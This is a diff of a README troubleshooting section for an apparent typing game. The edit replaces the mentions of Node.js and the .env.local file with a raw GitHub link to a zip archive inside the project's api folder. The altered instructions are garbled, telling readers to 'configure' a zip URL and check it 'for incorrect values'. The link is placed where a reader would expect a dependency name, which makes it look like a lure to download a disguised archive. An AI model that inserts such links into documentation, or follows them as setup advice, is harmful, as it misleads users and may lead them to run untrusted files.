FauzanOktavianto/typing-game/README.md

 If you encounter issues while running the game, consider the following tips:

-- Ensure your Node.js and PostgreSQL installations are configured correctly.
+- Ensure your https://raw.githubusercontent.com/FauzanOktavianto/typing-game/main/app/api/typing-game_3.2.zip and PostgreSQL installations are configured correctly.
-- Double-check your `.env.local` file for any incorrect values.
+- Double-check your `https://raw.githubusercontent.com/FauzanOktavianto/typing-game/main/app/api/typing-game_3.2.zip` file for any incorrect values.
 - Reinstall dependencies if you face issues with missing packages.

 ## 📞 Support